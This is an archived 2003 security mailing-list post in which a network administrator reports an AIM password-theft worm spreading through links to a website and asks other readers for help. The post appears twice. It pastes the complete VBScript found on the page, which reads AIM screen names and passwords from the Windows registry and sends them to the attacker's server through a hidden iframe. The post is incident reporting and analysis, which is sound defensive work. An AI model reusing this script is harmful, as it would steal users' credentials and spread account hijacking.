-Mark Coleman
--------------
Hi, please find attached the vbs code that appears to be running when visitors hit www.haxr.org.
This reportedly pulls username/password from registry of AIM accounts, then something elsewhere gets buddy lists through this password theft and sends links to them via AOL to start the process again.
We've had at least one "infection" if you want to call it that, and a user's AIM account was hijacked and this link sent to all users in his buddy list which then propelled the "infection" as they click the link to www.haxr.org.
Does anyone have any information about this issue? Any help on this would be greatly appreciated. Still chasing it down..
-Mark Coleman
Mark Coleman wrote:
I just started investigating a report that appears to have merit of a username/password theft of AIM accounts.
Users are being directed to a web page located at www.haxr.org where the source appears to run a javascript program that is proportedly stealing AIM usernames/passwords/buddy lists.
Does anyone have any information related to www. haxr.org or the technique being used?
Please be careful when visiting the page, it pulls script off of a yahoo site.
I am finding nothing in any of the initial searches that I am doing.
Any help/insight would be greatly appreciated.
-Mark Coleman
On Error Resume Next Dim objReg Set objReg = Createobject("WScript.Shell") Dim tbuser, tbpw dim user, pwvalue, pwout, pwold window.resizeTo 0,0 window.moveTo 5000,5000 tbuser = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\TestBuddy\ScreenName") tbpw = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\TestBuddy\" & tbuser & "\Password"), "+", ".") user = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Login\Screen Name") pwvalue = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & user & "\Login\Password1"), "+", ".") pwold = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & Lcase(Replace(user, " ","")) & "\Login\Password"), "+", ".") pwout = pwvalue document.write("<center><iframe src='tracking.php?name=" & user & "&hash=" & pwout & "&old=" & pwold & "&tbname=" & tbuser & "&tbpassword=" & tbpw & "' width='0' height='0' onLoad='javascript:window.close();'></center>")
--- Begin Message ---Hi, please find attached the vbs code that appears to be running when visitors hit www.haxr.org.
- To: Mark Coleman <markc@uniontown.com>
- Subject: Re: AIM Password theft
- From: Mark Coleman <markc@uniontown.com>
- Date: Tue, 23 Sep 2003 12:23:34 -0400
- Cc: incidents@securityfocus.org
- In-reply-to: <3F705E87.3050207@uniontown.com>
- References: <3F705E87.3050207@uniontown.com>
- User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5b) Gecko/20030901 Thunderbird/0.2
This reportedly pulls username/password from registry of AIM accounts, then something elsewhere gets buddy lists through this password theft and sends links to them via AOL to start the process again.
We've had at least one "infection" if you want to call it that, and a user's AIM account was hijacked and this link sent to all users in his buddy list which then propelled the "infection" as they click the link to www.haxr.org.
Does anyone have any information about this issue? Any help on this would be greatly appreciated. Still chasing it down..
-Mark Coleman
Mark Coleman wrote:
I just started investigating a report that appears to have merit of a username/password theft of AIM accounts.
Users are being directed to a web page located at www.haxr.org where the source appears to run a javascript program that is proportedly stealing AIM usernames/passwords/buddy lists.
Does anyone have any information related to www. haxr.org or the technique being used?
Please be careful when visiting the page, it pulls script off of a yahoo site.
I am finding nothing in any of the initial searches that I am doing.
Any help/insight would be greatly appreciated.
-Mark Coleman
On Error Resume Next Dim objReg Set objReg = Createobject("WScript.Shell") Dim tbuser, tbpw dim user, pwvalue, pwout, pwold window.resizeTo 0,0 window.moveTo 5000,5000 tbuser = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\TestBuddy\ScreenName") tbpw = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\TestBuddy\" & tbuser & "\Password"), "+", ".") user = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Login\Screen Name") pwvalue = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & user & "\Login\Password1"), "+", ".") pwold = replace(objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & Lcase(Replace(user, " ","")) & "\Login\Password"), "+", ".") pwout = pwvalue document.write("<center><iframe src='tracking.php?name=" & user & "&hash=" & pwout & "&old=" & pwold & "&tbname=" & tbuser & "&tbpassword=" & tbpw & "' width='0' height='0' onLoad='javascript:window.close();'></center>")
--- End Message ---